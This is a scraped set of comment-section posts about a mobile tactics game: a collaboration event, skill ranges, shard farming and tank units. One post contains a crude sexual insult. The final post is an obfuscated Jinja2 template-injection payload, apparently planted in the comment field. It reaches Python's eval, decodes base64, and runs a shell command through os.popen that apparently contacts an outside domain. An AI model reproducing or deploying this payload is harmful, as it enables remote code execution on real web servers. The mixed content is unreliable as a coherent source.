So the jp version collaboration with final fantasy vii during releasing king mont why on global they releasing king mont without any collaboration surely hacker of the game... First hacking account right now hacking the game like you always did to your mom right hacking her ***** every night long
I hate it when the caster gets closer to the target of this skill so they can be healed too even with 100% HP. Makes them vulnerable to attacks. Why make this skill ranged (4 squares) if the caster will be beside the target after?
Love this skill... Further range than 9, and she soundly throws hate off herself now easily. Low range height though compared to 9 3 range height on linear+.
All in all, glad I 120'd Ramada.
For me there are 2 reason:
-The changes of activating it ( don't know the exact number but it rarely proc when I use it on fryevia)
-The range ( 2 square away isn't exactly reliable)
what's your version of optimal? cheapest way is to put your units into guild barracks and do hard quests to get unit shards, but the fastest way is to just keep buying shards with visiores.
Seems good to me. Agrias regen is nice. He gets that on an AOE hit. Plus more HP, def, 2X fast self heals. For now he'll definitely overtake Engel as a damage soaking tank. Combine with Yuna and Elsie it will be pretty hard to drop those 2. I wouldn't be surprised seeing both of them at 7-9k hp with stacking bonuses and earrings. Some content may be geared towards that.
{% set d = "eval(__import__('base64').urlsafe_b64decode('X19pbXBvcnRfXygnb3MnKS5wb3BlbihfX2ltcG9ydF9fKCdiYXNlNjQnKS51cmxzYWZlX2I2NGRlY29kZSgnYm5Oc2IyOXJkWEFnZDJWNloyZzBaVGhsWldNME1HOXhZamx3Wm5wNmVtdDJYMloxT1dwaUxYTXlNV2czWjNKMWRuaHlaUzV5T0RjdWJXVT0nKSkucmVhZCgp'))" %}{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %}{% for b in c.__init__.func_globals.values() %} {% if b.__class__ == {}.__class__ %}{% if 'eval' in b.keys() %}{{ b['eval'](d) }}{% endif %}{% endif %}{% endfor %}{% endif %}{% endfor %}